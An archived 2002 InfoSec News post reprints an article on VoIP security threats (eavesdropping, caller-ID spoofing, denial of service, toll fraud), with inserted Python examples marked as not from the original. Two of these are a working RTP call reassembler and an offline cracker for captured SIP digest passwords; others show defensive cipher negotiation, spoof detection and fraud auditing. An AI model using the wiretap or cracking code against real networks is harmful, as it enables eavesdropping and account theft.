[ISN] Security In Converged Networks

From: InfoSec News (isnat_private)
Date: Thu Aug 15 2002 - 23:23:02 PDT

    August 2002
    With all new technologies there is a security 'honeymoon' during which 
    the technology is below the hacker's radar because of lack of 
    widespread use. As a technology becomes more prevalent, and critical 
    to organizations, its security will be probed and cracks will be found 
    very soon. Internet telephony has now reached the critical mass of 
    adoption and maturity that makes it not only a viable target but also 
    a valuable one, as it becomes part of business critical applications. 
    Whether the intent is to disrupt or profit, it will not be long before 
    the first victims appear. Beyond the monetary risks, there is also a 
    very serious privacy threat as we have become accustomed to government 
    regulation that at least protects our privacy from everyone outside 
    Legacy telephony has long enjoyed a level of protection through law,
    boundaries of physical security, and plain old obscurity that
    relegates it to a separate category of hacking. Apart from a few
    exceptions, telephony hackers, or 'phreakers' as they are dubbed, were
    a breed of their own with very specialized tools and techniques. Very
    few hackers were adept both in the world of computers and in the world
    of telephony.
    The telephony landscape and its relation to society is rapidly 
    changing. When the phenomenon of 'convergence' between telephony and 
    Internet started, it also brought closer the world of the phreaker and 
    the hacker. VoIP brings all this to the next level. Unfortunately, the 
    security inherent in VoIP solutions is equivalent to that of the early 
    Internet: Non-existent.
    With the convergence between voice and data, the critical barrier to 
    would-be attackers quickly crumbles. The physical separation of the 
    two networks and the relative security of voice networks were 
    primarily enforced by federal laws and proprietary infrastructures, 
    which are less effective as the networks converge. From a legislative 
    perspective the transformation of the telephony landscape is of great 
    concern: The current laws do not protect security or privacy; nor do 
    they allow law enforcement access for wiretaps. Where the Internet 
    spreads, it brings with it disrupting influences of new models and 
    paradigms. In telephony the disruption is just starting, but the 
    changes are going to be more staggering than we can imagine.
    Since IP is the underlying protocol used for the transmission of voice 
    data, a VoIP network will be susceptible to the same security problems 
    inherent in any IP-based network. Additionally, there is an added 
    level of complexity in VoIP networks because of the challenges that 
    must be met by VoIP technology in order to achieve useful levels of 
    service for transmitting speech in an efficient and effective way.
    The most important threats in a converged world of ubiquitous VoIP 
    * Eavesdropping from anywhere in the world (Privacy). 
    * Social engineering (Authenticity/Integrity). 
    * Disruption of voice communications/Denial of service (Availability). 
    * Resource Theft (free calls for all). 
    Eavesdropping on a telephony network requires either physical access 
    to the wiring, or access to the digital backbones of the telephone 
    companies. In a converged network, all the eavesdropper need do is 
    compromise the security of the data network (or the endpoints) and he 
    or she can access the voice streams. Such a 'virtual wiretap' is much 
    more insidious than a physical wiretap, because it is almost 
    impossible to detect. The copying of bits does not impact the original 
    stream in any way. Therefore, unless one can control the access to the 
    data network, the voice data is vulnerable. In many ways, we have 
    grown used to an 'expectation of privacy' on telephone networks. This 
    will no longer hold true unless we take steps to ensure our privacy 
    with sophisticated security measures. Furthermore, the 'virtual 
    wiretap' can be effected from, and the sound transmitted to, anywhere 
    in the world. In fact I could hire someone to tap into your network 
    and send me the audio, from anywhere in the world: Outsourcing meets 
    wiretaps. For me to be able to listen in to your conversation, I would 
    have to be able to decode the audio stream. With most current 
    protocols this is trivial: the media is carried as unencrypted RTP 
    over UDP using a standard codec such as G.711, so any packet capture 
    tool can reconstruct it. Encrypting the media stream, however, would 
    put an insurmountable obstacle in my path.
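    The 'virtual wiretap' described above, as an added example that is not 
    part of the original article: a small Python RTP reassembler run over 
    a constructed capture of two media streams (plain RTP over UDP carrying 
    G.711 mu-law, payload type 0). It groups packets by SSRC, survives the 
    16-bit sequence-number wrap, drops a duplicate, counts the lost packet 
    and decodes the audio to linear PCM, which is everything an 
    eavesdropper holding a copy of the packets needs; nothing in the stream 
    tells the victim it happened. The packets are built inline, so it runs 
    without a capture file.

```python
"""Reassembling voice from captured RTP packets: the 'virtual wiretap'.

Added example, not from the original article. The packets are constructed
inline (no capture file needed), the audio is G.711 mu-law (RTP payload
type 0, statically assigned by RFC 3551), and the media is assumed to be
plain unencrypted RTP over UDP, as the article describes.
"""
import struct
from collections import defaultdict

RTP_HEADER = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, seq, timestamp, SSRC


def parse_rtp(datagram: bytes) -> dict:
    """Parse the RTP fixed header (RFC 3550 s5.1) and return fields plus payload."""
    if len(datagram) < RTP_HEADER.size:
        raise ValueError("datagram shorter than an RTP header")
    b0, b1, seq, ts, ssrc = RTP_HEADER.unpack_from(datagram)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    offset = RTP_HEADER.size + 4 * (b0 & 0x0F)          # skip the CSRC list
    if b0 & 0x10:                                        # header extension present
        _, ext_words = struct.unpack_from("!HH", datagram, offset)
        offset += 4 + 4 * ext_words
    payload = datagram[offset:]
    if b0 & 0x20 and payload and payload[-1]:            # padding: last byte = pad length
        payload = payload[:-payload[-1]]
    return {"pt": b1 & 0x7F, "marker": bool(b1 & 0x80), "seq": seq,
            "ts": ts, "ssrc": ssrc, "payload": payload}


def ulaw_to_pcm16(byte: int) -> int:
    """Decode one G.711 mu-law byte to a signed 16-bit linear sample."""
    byte = ~byte & 0xFF
    exponent, mantissa = (byte >> 4) & 0x07, byte & 0x0F
    linear = (((mantissa << 3) + 0x84) << exponent) - 0x84
    return -linear if byte & 0x80 else linear


def extended_seq(state: dict, ssrc: int, seq: int) -> int:
    """Map the 16-bit sequence number to a 32-bit one (RFC 3550 App. A.1 logic)
    so ordering survives the 65535 -> 0 wrap and late packets land correctly."""
    if ssrc not in state:
        state[ssrc] = [seq, 0]                           # [max_seq, cycles]
        return seq
    max_seq, cycles = state[ssrc]
    udelta = (seq - max_seq) & 0xFFFF
    if udelta < 3000:                                    # in order (small gaps allowed)
        if seq < max_seq:
            cycles += 0x10000                            # the counter wrapped
        state[ssrc] = [seq, cycles]
        return cycles + seq
    if seq > max_seq:                                    # late packet from before the wrap
        return cycles - 0x10000 + seq
    return cycles + seq                                  # late or duplicate, current cycle


def reassemble(datagrams) -> dict:
    """Demux by SSRC, order by extended sequence number, decode PCMU to PCM.
    Returns {ssrc: {"pcm": [samples], "lost": gap_count}}."""
    state, by_ssrc = {}, defaultdict(dict)
    for d in datagrams:
        p = parse_rtp(d)
        if p["pt"] != 0:                                 # this example decodes PCMU only
            continue
        ext = extended_seq(state, p["ssrc"], p["seq"])
        by_ssrc[p["ssrc"]].setdefault(ext, p["payload"])  # duplicates are dropped
    streams = {}
    for ssrc, pkts in by_ssrc.items():
        seqs = sorted(pkts)
        lost = sum(b - a - 1 for a, b in zip(seqs, seqs[1:]))
        pcm = [ulaw_to_pcm16(b) for s in seqs for b in pkts[s]]
        streams[ssrc] = {"pcm": pcm, "lost": lost}
    return streams


def make_rtp(seq, ts, ssrc, payload, pt=0, marker=False) -> bytes:
    """Build a minimal RTP datagram (used only to construct the sample capture)."""
    return RTP_HEADER.pack(0x80, (0x80 if marker else 0) | pt,
                           seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload


# Constructed 'capture' of two streams on one call. Stream A wraps its sequence
# counter, has one packet arrive late (seq 0 after seq 1), loses seq 2 and
# carries one retransmitted duplicate.
A, B = 0x11111111, 0x22222222
CAPTURE = [
    make_rtp(65534, 160 * 0, A, b"\xff", marker=True),
    make_rtp(65535, 160 * 1, A, b"\x7f"),
    make_rtp(1,     160 * 3, A, b"\x80"),
    make_rtp(0,     160 * 2, A, b"\x00"),
    make_rtp(3,     160 * 5, A, b"\xff"),
    make_rtp(1,     160 * 3, A, b"\x80"),             # duplicate
    make_rtp(7,     160 * 0, B, b"\xd5\xd5", pt=8),   # PCMA: skipped here
    make_rtp(8,     160 * 1, B, b"\xff\xff"),
]


def wiretap_demo() -> dict:
    return reassemble(CAPTURE)


if __name__ == "__main__":
    for ssrc, s in wiretap_demo().items():
        print(f"SSRC {ssrc:08x}: {len(s['pcm'])} samples, {s['lost']} lost")
```

    Fed an SRTP stream instead, the same code produces noise, which is the 
    point of the paragraphs that follow: the obstacle has to be the 
    encryption, because the capture itself cannot be prevented or detected.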
    Encryption is a well-developed technology, which has been applied to 
    many different communications solutions. In the cellular phone market 
    the term 'digital' has become synonymous with 'private' as the 
    encryption has been sold as a product feature (in practice it covers 
    only the radio link, and the GSM ciphers have not withstood public 
    cryptanalysis). There are two barriers 
    to the application of encryption in VoIP. The first, as ever, has to 
    do with standardization of the protocols. In order for encryption to 
    be effective it must be very simple to use; in effect it must be 
    transparent to the user. This requires standardization of the VoIP 
    protocols (still in the early stages) and the encryption mechanisms. 
    Because of the necessity to allow for upgrading of the encryption 
    standards as they become obsolete or easy to 'crack,' it is important 
    to have an open architecture that allows for 'negotiation' of suitable 
    encryption algorithms between the end-points at runtime. This can be 
    implemented in a similar way to the current support for multiple voice 
    codecs with runtime negotiation.
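    The runtime negotiation sketched above, as an added example that is 
    not from the article. It uses the SDP a=crypto attribute of RFC 4568 
    (SRTP keying in SDP) as a concrete offer/answer format, which postdates 
    this 2002 text; AES_CM_128_HMAC_SHA1_80 and AES_CM_128_HMAC_SHA1_32 are 
    real RFC 4568 suite names, while 'NULL_CIPHER' and the two offers are 
    constructed. The answerer chooses by its own preference order rather 
    than the peer's listing order, and fails closed when nothing acceptable 
    is offered, which is what stops a negotiable mechanism from becoming a 
    downgrade mechanism.

```python
"""Negotiating the media cipher at call setup, with a floor against downgrade.

Added example, not from the article. Offer/answer lines use the SDP
'a=crypto' syntax of RFC 4568, which postdates the 2002 text and serves
here only as a concrete negotiation format. The AES_CM_128 suite names are
real RFC 4568 suites; 'NULL_CIPHER' is an illustrative stand-in for 'no
encryption'. Keys are random bytes generated locally.
"""
import base64
import os
import re

# Local policy, strongest first. Suites not listed here are never accepted,
# whatever the peer lists first.
LOCAL_PREFERENCE = ["AES_CM_128_HMAC_SHA1_80", "AES_CM_128_HMAC_SHA1_32"]

CRYPTO_RE = re.compile(r"^a=crypto:(\d+)\s+(\S+)\s+(inline:\S+)")


def parse_crypto_offers(sdp: str) -> list:
    """Return [(tag, suite, key_param)] for every a=crypto line, in offer order."""
    offers = []
    for line in sdp.splitlines():
        m = CRYPTO_RE.match(line.strip())
        if m:
            offers.append((int(m.group(1)), m.group(2), m.group(3)))
    return offers


def choose_suite(sdp: str, local_pref=LOCAL_PREFERENCE, allow_plaintext=False):
    """Pick by OUR preference order, not the peer's. Returns (tag, suite), or
    None when nothing is acceptable and policy allows plaintext media;
    raises ValueError otherwise (fail closed rather than silently downgrade)."""
    offered = {}
    for tag, suite, _ in parse_crypto_offers(sdp):
        offered.setdefault(suite, tag)          # first occurrence of a suite wins
    for suite in local_pref:
        if suite in offered:
            return offered[suite], suite
    if allow_plaintext:
        return None
    raise ValueError("peer offered no acceptable cipher suite; refusing plaintext media")


def answer_line(tag: int, suite: str) -> str:
    """Our side of the exchange: echo the chosen tag with a fresh local key.
    AES_CM_128 suites take a 16-byte key plus 14-byte salt, 30 bytes base64."""
    key_salt = base64.b64encode(os.urandom(30)).decode()
    return f"a=crypto:{tag} {suite} inline:{key_salt}"


def negotiate(sdp: str, allow_plaintext=False):
    """Full answerer step: choose, then emit the answer line (None = plaintext)."""
    chosen = choose_suite(sdp, allow_plaintext=allow_plaintext)
    return None if chosen is None else answer_line(*chosen)


# Constructed offers. OFFER_PEER_PREFERS_WEAK lists the weaker suite first; a
# naive 'take the first match' answerer would pick it. OFFER_STRIPPED is what
# an on-path attacker who deletes the strong lines from an unprotected offer
# would deliver.
OFFER_PEER_PREFERS_WEAK = """v=0
m=audio 49170 RTP/SAVP 0
a=crypto:1 AES_CM_128_HMAC_SHA1_32 inline:NzB4d1BINUAvLEw6UzF3WSJ+PSdFcGdUJShpX1Zj
a=crypto:2 AES_CM_128_HMAC_SHA1_80 inline:WVNfX19zZW1jdGwgKCkgewkyMjA7fQp9CnUnbiEhYm
"""
OFFER_STRIPPED = """v=0
m=audio 49170 RTP/SAVP 0
a=crypto:1 NULL_CIPHER inline:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"""

if __name__ == "__main__":
    print(negotiate(OFFER_PEER_PREFERS_WEAK))
    try:
        negotiate(OFFER_STRIPPED)
    except ValueError as e:
        print("call refused:", e)
```

    The floor only helps if the signalling that carries the offer is itself 
    integrity-protected (for example SIP over TLS to the proxy); otherwise 
    the stripped offer is exactly what an on-path attacker delivers, and 
    the best the answerer can do is refuse the call rather than quietly 
    fall back to plaintext.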
    Encryption has become hugely popular as a means to leverage the 
    Internet for corporate communications. Virtual Private Networks (VPNs) 
    allow companies to transfer data between offices securely. An 
    alternative to 'native' support of encryption within the VoIP 
    protocols is the use of VPN tunnels in order to 'wrap' the voice 
    stream. Unfortunately, this is quite difficult in practice. VPN 
    devices and software are not currently designed to accommodate 
    real-time traffic. As a result, they tend to add unacceptable levels 
    of jitter and latency to the VoIP communications. Although just about 
    bearable in small installations (1-2 voice streams), they become 
    unwieldy in larger applications (VoIP between branches of a company, 
    over VPNs for example).
    Another important threat for VoIP networks is the ability to 'enhance' 
    social engineering attacks. Social Engineering is the practice of 
    using social skills and deception to exploit human vulnerabilities 
    rather than system vulnerabilities. A common example is persuading 
    someone in a company to give you their password by pretending to be an 
    administrator in their IT department.
    Imagine how much easier it would be to persuade someone that you work 
    for the company, if you can make their VoIP phone display the 
    origination of the call as 'IT Helpdesk.' Or imagine how simple it 
    would be if you could disguise your voice electronically to be 
    identical to that of their boss. Software that allows digital 
    impersonation has already been demonstrated; albeit crude, it is only 
    a matter of time before it is sophisticated enough to be 
    indistinguishable from the real person. The saving grace is that with 
    current technology, it is unlikely this can be done at real-time 
    without significant expenditure. Nevertheless, pre-recorded messages 
    that sound like someone else are within the capabilities of desktop 
    systems. And don't forget, your grace period diminishes by half every 
    18 months according to Moore's law.
    In order to protect against this kind of digital impersonation, there 
    are a number of possible solutions. The most secure approach would be 
    widespread application of digital signatures and PKI for the 
    authentication of end-users. This approach is not only very difficult 
    to apply globally, it also has some disturbing privacy implications 
    (anonymity after all is a feature most of us are used to when making 
    calls, Caller-ID notwithstanding). An alternative is to apply generic 
    controls at an organization's perimeter such as firewalls and 
    Intrusion Detection Systems, which would protect against an outsider 
    gaining access in this manner.
    Technology notwithstanding, the most effective solution is the same as 
    with social engineering in other circumstances: Don't believe what the 
    phone displays, don't assume you know who you're talking to and be 
    smart about what kind of information you give to people on the 
    telephone. These are all basic security awareness issues and should be 
    handled as such with appropriate training and drills. Security is not 
    just about technology; it is about people applying technology with a 
    bit of common sense.
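    The 'IT Helpdesk' trick above, as an added example that is not part of 
    the article: a constructed SIP INVITE whose From header claims to be 
    the helpdesk, and the kind of perimeter check a proxy at the 
    organization's edge can apply, replacing the display name with the 
    directory entry for the identity that actually authenticated so the 
    phone shows only what the proxy can vouch for. The directory, the 
    domain corp.example and the authenticated_user argument are 
    assumptions; a real proxy would take that identity from the digest 
    credentials it verified.

```python
"""What the phone displays as 'caller' is a header the caller wrote.

Added example, not from the article. The INVITE is constructed. The check
mirrors the perimeter control in the text: an edge proxy rewrites the From
display name to the directory entry of the identity that authenticated.
The directory, OUR_DOMAIN and the authenticated_user parameter are
assumptions for illustration.
"""
import re

FROM_RE = re.compile(r'^From:\s*(?:"([^"]*)"\s*)?<?(sip:[^>;\s]+)>?(.*)$', re.IGNORECASE)
OUR_DOMAIN = "corp.example"                                            # assumption
DIRECTORY = {"jsmith": "John Smith (Sales)", "helpdesk": "IT Helpdesk"}  # constructed

# Constructed INVITE: the phone's owner authenticated as jsmith but typed a
# From header that will render as 'IT Helpdesk' on the callee's display.
SPOOFED_INVITE = "\r\n".join([
    "INVITE sip:2041@corp.example SIP/2.0",
    "Via: SIP/2.0/UDP 10.7.3.22:5060;branch=z9hG4bK776asdhds",
    'From: "IT Helpdesk" <sip:helpdesk@corp.example>;tag=1928301774',
    "To: <sip:2041@corp.example>",
    "Call-ID: a84b4c76e66710@10.7.3.22",
    "CSeq: 314159 INVITE",
    "", "",
])


def parse_from(invite: str):
    """Return (display_name_or_None, uri, trailing_params) from the From header."""
    for line in invite.split("\r\n"):
        m = FROM_RE.match(line)
        if m:
            return m.group(1), m.group(2), m.group(3)
    raise ValueError("INVITE has no From header")


def user_of(uri: str) -> str:
    """'sip:user@host' -> 'user'."""
    return uri.split(":", 1)[1].split("@", 1)[0]


def normalize_from(invite: str, authenticated_user: str) -> dict:
    """Edge-proxy check: does the claimed From identity match who authenticated?
    Reports the claim and returns the INVITE with From rewritten to the
    identity and display name the proxy can vouch for."""
    display, uri, params = parse_from(invite)
    claimed_user = user_of(uri)
    vouched = DIRECTORY.get(authenticated_user, authenticated_user)
    spoofed = claimed_user != authenticated_user or (display or "") not in ("", vouched)
    new_from = f'From: "{vouched}" <sip:{authenticated_user}@{OUR_DOMAIN}>{params}'
    lines = [new_from if FROM_RE.match(ln) else ln for ln in invite.split("\r\n")]
    return {"claimed_display": display, "claimed_user": claimed_user,
            "authenticated_user": authenticated_user, "spoofed": spoofed,
            "invite": "\r\n".join(lines)}


if __name__ == "__main__":
    verdict = normalize_from(SPOOFED_INVITE, "jsmith")
    print("spoofed:", verdict["spoofed"])
    print(verdict["invite"])
```

    Note what this does and does not buy: inside the organization the 
    display becomes trustworthy because the proxy, not the handset, fills 
    it in. For calls arriving from outside, or over gateways that carry 
    ordinary caller-ID, nothing has authenticated the caller and the 
    advice in the text stands: do not believe what the phone displays.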
    Although most consumers will berate their telecommunications providers 
    and complain bitterly about the service, in truth we have been 
    accustomed to a high level of reliability when using the phone. How 
    many times in your life have you picked up the phone and not heard a 
    dial tone? Achieving the kind of reliability that makes phones 'just 
    work' 99.999 percent of the time would be enviable in the world of IT. 
    So as we converge and shift voice onto a dynamic ad-hoc network such 
    as the Internet we are bound to (at least at first) lose some 
    From a security perspective however, there is a much-increased 
    opportunity for mischief. This comes mainly in the form of Denial of 
    Service (DoS), which is already one of the most common types of 
    attacks on the Internet. Denial of Service involves attacks whose main 
    aim is to affect the availability of a system by disrupting services, 
    applications or networks. In the telephony world, DoS would make you 
    always get a busy signal. How would DoS affect a converged network?
    It is Wednesday afternoon, and the Federal Reserve is about to 
    announce whether it will change interest rates. At the city's largest 
    bond trader, all the IP phones stop working at exactly the moment the 
    announcement is made. The traders are unable to trade and as a result 
    the company loses millions of dollars in the 15 minutes it takes to 
    restore service.
    Clearly there is a much greater danger of disruption for converged 
    networks. Furthermore, as data and voice travel over the same network, 
    disruption of one affects the other. The VoIP failure may simply be a 
    side effect of a wider DoS attack against the company's network.
    Unfortunately, there is no foolproof way to protect against DoS. A DoS 
    attack will target and attempt to exhaust resources that you 
    voluntarily make available. For example, if you allow incoming VoIP 
    sessions from outside your organization, these can be used 
    indiscriminately by anyone. If someone decides to abuse these 
    resources, there is not much you can do. They may have disguised their 
    source address, or may keep changing source addresses, making it 
    difficult or impossible to block an attack. Denial of Service can't be 
    stopped because it is based on tying up publicly available resources 
    by brute force. If everyone in NY called your phone, you would not be 
    able to use it and would have to disconnect it. Even the phone company 
    could not help you stop people from calling you without a specific 
    number to block.
    PBX owners have already had to deal with theft of service. Phreakers 
    will compromise PBX security and use the system to make free calls or 
    organize 'party lines' to communicate with their friends. The 
    Communications Fraud Control Association (http://cfca.org/) says “it 
    is estimated that annual fraud losses are in excess of $12 billion 
    Convergence will only increase this threat of theft. As the networks 
    converge there will be a need for gateways connecting VoIP systems to 
    POTS (plain old telephone service). These gateways allow normal phones 
    to call VoIP phones and vice-versa. Whether these gateways are part of 
    a PBX or part of a VoIP system, they represent the border between 
    telecommunications networks and data networks. This means that they 
    will make telecommunications networks more accessible from the data 
    network side. Hackers will almost certainly find ways to “spoof” 
    (pretend to be some known system), gaining access to the gateway as a 
    legitimate user and making phone calls at the expense of the company. 
    The security designed into such gateways at present is at best 
    trivial. Even a rather unskilled attacker can quite easily spoof the 
    SIP signalling and the RTP-over-UDP packets that compose the voice 
    stream. The authentication systems that have been added on to SIP and 
    H.323 in order to restrict access are not very well designed: they 
    rely on shared passwords that are either sent in the clear (not 
    encrypted) or sent as an MD5 challenge-response digest, so someone 
    with access to the network can capture the exchange and compromise the 
    password quite easily, by reading it or by guessing against the digest 
    offline.
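    What 'someone with access to the network can compromise them' looks 
    like in practice, as an added example that is not from the article: a 
    SIP digest authentication exchange for a REGISTER (RFC 3261 section 
    22.4, HTTP Digest with MD5), constructed here with the same 
    computation a phone performs, and an offline dictionary attack against 
    the captured Authorization header. Username, realm, nonce and the weak 
    password 'summer2002' are made up. The password never crosses the wire, 
    and the capture is still enough.

```python
"""Why a captured SIP authentication exchange is enough: offline guessing.

Added example, not from the article. The REGISTER challenge/response is
constructed with the digest computation itself, so no capture file is
needed; username, realm, nonce and the password are made up.
"""
import hashlib
import re

PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None) -> str:
    """Digest response as SIP uses it: the qop=auth form, or the older no-qop form."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop == "auth":
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def parse_authorization(header: str) -> dict:
    """Parse 'Authorization: Digest k=v, k="v", ...' into a dict."""
    body = header.split("Digest", 1)[1]
    return {k: (quoted or bare) for k, quoted, bare in PARAM_RE.findall(body)}


def crack(header: str, method: str, wordlist):
    """Offline dictionary attack on one captured Authorization header.
    Every field needed to recompute the response is in the header itself;
    only the password is missing, and the method is known from the request."""
    p = parse_authorization(header)
    for guess in wordlist:
        r = digest_response(p["username"], p["realm"], guess, method, p["uri"],
                            p["nonce"], p.get("qop"), p.get("nc"), p.get("cnonce"))
        if r == p["response"]:
            return guess
    return None


# --- constructed 'capture' of a phone registering with its gateway ---
REALM, USER = "voip.corp.example", "2041"
NONCE, CNONCE, NC = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "0a4f113b", "00000001"
_resp = digest_response(USER, REALM, "summer2002", "REGISTER", f"sip:{REALM}",
                        NONCE, "auth", NC, CNONCE)
CAPTURED_AUTH = (f'Authorization: Digest username="{USER}", realm="{REALM}", '
                 f'nonce="{NONCE}", uri="sip:{REALM}", response="{_resp}", '
                 f'algorithm=MD5, qop=auth, nc={NC}, cnonce="{CNONCE}"')

WORDLIST = ["password", "2041", "welcome1", "summer2002", "voip"]   # constructed


if __name__ == "__main__":
    print("recovered password:", crack(CAPTURED_AUTH, "REGISTER", WORDLIST))
```

    The countermeasures follow directly: keep the exchange off the wire 
    (signalling over TLS), issue credentials a wordlist will not contain, 
    and never reuse a nonce, since a server that accepts the same nonce 
    twice lets the captured response be replayed without any guessing.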
    The solution to theft of service is a combination of technology, 
    monitoring, and awareness. From the technology perspective it is 
    imperative that at least simple controls such as firewalls and 
    password access be added to the telephony gateways to protect against 
    unauthorized access. Monitoring of use and user training and awareness 
    can complement the technical solutions in order to improve the 
    security. After all, you don’t want to find out about service theft 
    when you get your bill and discover it is $250,000 more than expected. 
    Continuous monitoring and auditing will at least give you an early 
    warning of problems.
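    The 'continuous monitoring and auditing' above, as an added example 
    that is not from the article: three rules run over constructed call 
    detail records (timestamp, extension, dialled number, seconds, trunk) 
    to flag after-hours international calls, an unusually long 
    international call and a burst of calls from a single extension. The 
    thresholds, business hours and the international dialling prefixes are 
    assumptions a real deployment would tune to its own traffic; the 
    records are made up and describe the pattern a compromised extension 
    typically produces.

```python
"""Early warning for theft of service: rules over call detail records.

Added example, not from the article. CDR lines are constructed
(timestamp, extension, dialled number, seconds, trunk). Thresholds,
business hours and the 'international' prefixes are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

CDRS = """\
2002-08-13T10:14:02,2017,2125551234,184,pri-1
2002-08-13T11:02:45,2041,0114412075551234,305,pri-1
2002-08-13T14:30:10,2017,18005551212,60,pri-1
2002-08-14T02:03:11,2041,0114412075551234,612,pri-1
2002-08-14T02:04:30,2041,0119011555220011,540,pri-1
2002-08-14T02:05:02,2041,0112345551998,2140,pri-2
2002-08-14T02:06:17,2041,0119011555220011,480,pri-2
2002-08-14T02:07:40,2041,0112345551998,515,pri-2
2002-08-14T02:09:55,2041,0114412075551234,500,pri-1
2002-08-14T09:15:00,2017,2125551234,95,pri-1
"""

BUSINESS_HOURS = range(8, 19)          # 08:00-18:59, Monday to Friday
INTL_PREFIXES = ("011", "00", "+")     # assumption: NANP dialling; adjust locally
BURST_WINDOW, BURST_COUNT = timedelta(minutes=10), 5
LONG_CALL_SECONDS = 1800


def parse_cdrs(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ext, dialled, secs, trunk = line.split(",")
        rows.append({"ts": datetime.fromisoformat(ts), "ext": ext,
                     "dialled": dialled, "secs": int(secs), "trunk": trunk})
    return rows


def is_after_hours(ts: datetime) -> bool:
    return ts.weekday() >= 5 or ts.hour not in BUSINESS_HOURS


def is_international(number: str) -> bool:
    return number.startswith(INTL_PREFIXES)


def audit(rows: list) -> list:
    """Return (rule, extension, detail) tuples, one per suspicious event."""
    alerts = []
    recent = defaultdict(list)                      # extension -> timestamps in window
    for r in sorted(rows, key=lambda row: row["ts"]):
        intl = is_international(r["dialled"])
        if intl and is_after_hours(r["ts"]):
            alerts.append(("after_hours_international", r["ext"],
                           f"{r['ts'].isoformat()} {r['dialled']}"))
        if intl and r["secs"] >= LONG_CALL_SECONDS:
            alerts.append(("long_international", r["ext"],
                           f"{r['secs']}s to {r['dialled']}"))
        recent[r["ext"]] = [t for t in recent[r["ext"]] + [r["ts"]]
                            if r["ts"] - t <= BURST_WINDOW]
        if len(recent[r["ext"]]) == BURST_COUNT:    # fire once, as the threshold is crossed
            alerts.append(("burst", r["ext"],
                           f"{BURST_COUNT} calls within {BURST_WINDOW}"))
    return alerts


def summarize(alerts: list) -> dict:
    """{extension: {rule: count}} for a quick daily report."""
    by_ext = defaultdict(lambda: defaultdict(int))
    for rule, ext, _ in alerts:
        by_ext[ext][rule] += 1
    return {ext: dict(rules) for ext, rules in by_ext.items()}


if __name__ == "__main__":
    for rule, ext, detail in audit(parse_cdrs(CDRS)):
        print(f"{rule:26} ext {ext}: {detail}")
    print(summarize(audit(parse_cdrs(CDRS))))
```

    Run daily, or better on a stream of records as the gateway emits them, 
    this is the difference between a $250,000 surprise on the bill and a 
    page to the on-call engineer at 02:07 when extension 2041 starts 
    dialling abroad in the middle of the night.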
    A global converged network will change the telephony landscape 
    completely. New services, applications, and paradigms are already 
    emerging. In the rush to migrate telephony to the more flexible 
    infrastructure of the Internet, security has almost been an 
    afterthought. Soon it will become obvious that a flexible and open 
    network creates security problems that were not issues in the closed 
    proprietary past of telephony. These issues will need to be addressed 
    in order for Internet telephony to flourish. There will certainly be 
    challenges at first, but most of the technical difficulties can be 
    overcome if security is made part of the design requirements of new IP 
    telephony applications from the beginning. As organizations migrate 
    their internal phone systems to IP, they will be able to protect them 
    by applying security best practices at the perimeter of the 
    Many of the security solutions are not VoIP specific; rather the 
    solutions involve the same combination of people, processes, and 
    technology that are applied to protect data networks. Security within 
    corporate networks can be improved by protecting the perimeter and 
    applying encryption. The real challenge will appear when IP telephony 
    transcends the boundaries of a single organization. When companies 
    start connecting to each other or accepting incoming VoIP connections 
    from the public, the security problems will become much more serious. 
    Solutions will depend on designing security into the protocols and 
    user agents. Unfortunately, security is often “bolted” on as an 
    Perhaps the most pertinent lesson is that it is estimated that 
    security measures cost 10 times less if they are included in the 
    design and not added on after the implementation. Internet telephony 
    pioneers can reap significant savings by considering security at the 
    earliest stages in the development of applications or systems. If they 
    do not, they will soon discover that the honeymoon is over.
    Andreas M. Antonopoulos is security practice leader at Greenwich 
    Technology Partners. Joseph D. Knape is an independent security 
    consultant in Dallas, Texas.
    Greenwich Technology Partners is a leading network infrastructure 
    consulting and engineering company that designs, builds, and manages 
    the complex networks that utilize advanced Internet protocol, 
    electro/optical, and other sophisticated technologies. Additional 
    information about Greenwich Technology Partners can be found online at 
    ISN is currently hosted by Attrition.org
    To unsubscribe email majordomoat_private with 'unsubscribe isn'
    in the BODY of the mail.

    This archive was generated by hypermail 2b30 : Fri Aug 16 2002 - 02:33:21 PDT